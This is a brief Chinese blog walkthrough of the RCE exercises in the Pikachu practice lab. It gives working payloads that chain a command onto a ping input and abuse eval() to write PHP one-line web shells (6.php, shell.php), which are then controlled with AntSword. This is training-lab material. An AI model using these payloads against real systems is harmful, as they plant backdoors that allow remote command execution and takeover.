Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
微风起皱4 小时前
Keepalived 高可用集群
运维·服务器
盖头盖5 小时前
【无参数_Rce】
服务器
LateFrames7 小时前
IIS 窗口不显示,但是任务栏状态正常
服务器·windows·microsoft
feng68_7 小时前
HAProxy算法实践
linux·运维·haproxy
志栋智能7 小时前
AI驱动的系统自动化巡检:重塑IT基石的智慧“守护神”
大数据·运维·人工智能·云原生·自动化
DeeplyMind8 小时前
第23章 ROCm虚拟化栈Docker化实战
运维·docker·容器
吹牛不交税9 小时前
在vmware中右键SSH连接虚拟机报错Could not resolve hostname
linux·服务器·ssh
西柚云9 小时前
把Codex装进VSCode!OpenAI编程助手插件版来了
服务器·ide·vscode·ai编程·codex
xiaoliuliu1234511 小时前
Xshell-7.0.0111p安装步骤详解(附SSH连接与远程命令教程)
运维·ssh
gaize121311 小时前
服务器是什么?用来做什么?基本属性有什么?如何配置和挑选?
运维·服务器
热门推荐
01GitHub 镜像站点02从零搭建一个 PHP 登录注册系统(含完整源码)03使用 1panel面板 部署 php网站04AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot05openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南06MIUI显示/隐藏5G开关的方法,信号弱时开启手机Wifi通话方法07Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services08配置 OpenClaw 使用 Ollama 本地模型09让你的代码更整洁:10 个必知的 Kotlin 扩展函数10全面体验 Grok API 中转站(2025 · Grok 4 系列最新版)